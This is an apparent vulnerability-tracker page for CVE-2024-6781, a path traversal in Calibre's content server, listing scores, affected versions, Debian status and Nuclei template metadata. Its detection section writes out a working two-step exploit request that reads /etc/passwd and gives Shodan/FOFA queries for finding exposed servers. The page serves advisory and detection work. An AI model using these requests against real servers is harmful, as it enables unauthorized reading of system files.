CVE-2024-6781
published 2024-08-06CVE-2024-6781: Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.
PriorityP277high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EXPLOIT
EPSS
62.70%
99.1th percentile
Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| calibre-ebook | calibre | <= 7.14.0 | — |
| calibre | calibre | — | — |
| calibre | calibre | >= 0 < 7.16.0+ds-1 | 7.16.0+ds-1 |
| calibre | calibre | >= 0 < 7.16.0+ds-1 | 7.16.0+ds-1 |
| debian | calibre | < calibre 7.16.0+ds-1 (forky) | calibre 7.16.0+ds-1 (forky) |
Detection & IOCsextracted from sources · hover to see the quote
urlGET /interface-data/books-init HTTP/1.1
urlPOST /cdb/cmd/export HTTP/1.1
command["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
path../../../../../etc/passwd
- →First stage: send GET to /interface-data/books-init to extract a valid book_id from '.search_result.book_ids[0]' via JSON extraction, then use it in the exploit POST.
- →Second stage: POST to /cdb/cmd/export with Content-Type: application/json and body ["extra_file", <book_id>, "../../../../../etc/passwd", ""] to trigger path traversal arbitrary file read.
- →Successful exploitation returns HTTP 200 with Content-Type: application/json and a body matching both 'root:.*:0:0:' and '"result":' patterns.
- →No authentication is required; the vulnerability is exploitable by unauthenticated attackers against Calibre's content server. ↗
- →Identify exposed Calibre content servers via Shodan (html:"Calibre") or FOFA (Server: calibre) for attack surface enumeration.
- ·The exploit requires a two-step HTTP interaction: first retrieve a valid book_id, then use it in the path traversal POST. A single-request detection will miss the dependency.
- ·Affected versions are Calibre <= 7.14.0; fixed in 7.15.0+ (upstream) and 7.16.0+ds-1 (Debian). Ensure version checks in scanners target this range. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
CVE-2024-6781: Path traversal in Calibre <= 7
osv·2024-08-06·CVSS 7.5
CVE-2024-6781 [HIGH] CVE-2024-6781: Path traversal in Calibre <= 7
Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.
GHSA
GHSA-p89v-3g23-m6q2: Path traversal in Calibre <= 7
ghsa_unreviewed·2024-08-06
CVE-2024-6781 [HIGH] CWE-22 GHSA-p89v-3g23-m6q2: Path traversal in Calibre <= 7
Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.
Debian
CVE-2024-6781: calibre - Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve a...
vendor_debian·2024·CVSS 7.5
CVE-2024-6781 [HIGH] CVE-2024-6781: calibre - Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve a...
Path traversal in Calibre <= 7.14.0 allow unauthenticated attackers to achieve arbitrary file read.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved (fixed in 7.16.0+ds-1)
sid: resolved (fixed in 7.16.0+ds-1)
trixie: resolved (fixed in 7.16.0+ds-1)
No detection rules found.
Nuclei
Calibre <= 7.14.0 Arbitrary File Read
nuclei·CVSS 7.5
CVE-2024-6781 [HIGH] Calibre <= 7.14.0 Arbitrary File Read
Calibre <= 7.14.0 Arbitrary File Read
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
Template:
id: CVE-2024-6781
info:
name: Calibre <= 7.14.0 Arbitrary File Read
author: DhiyaneshDK
severity: high
description: |
Arbitrary file read via Calibre’s content server in Calibre <= 7.14.0.
impact: |
Attackers can exploit the content server's export functionality to read arbitrary files from the system through path traversal.
remediation: |
Update Calibre to version 7.15.0 or later to address the arbitrary file read vulnerability.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
cve-id: CVE-2024-6781
cwe-id: CWE-22
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
epss-score: 0.93721
epss-percentile: 0.9985
cpe: cpe:2.3:a:
Nuclei
Calibre <= 7.14.0 Remote Code Execution
nuclei·CVSS 9.8
CVE-2024-6782 [CRITICAL] Calibre <= 7.14.0 Remote Code Execution
Calibre <= 7.14.0 Remote Code Execution
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
Template:
id: CVE-2024-6782
info:
name: Calibre <= 7.14.0 Remote Code Execution
author: DhiyaneshDK
severity: critical
description: |
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
impact: |
Unauthenticated attackers can execute arbitrary Python code through the content server's template functionality, achieving complete system compromise.
remediation: |
Update Calibre to version 7.15.0 or later to address the remote code execution vulnerability.
reference:
- https://starlabs.sg/advisories/24/24-6781/
classification:
cve-id: CVE-2024-6782
cwe-id: CWE-863
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-
No writeups or analysis indexed.
2024-08-06
Published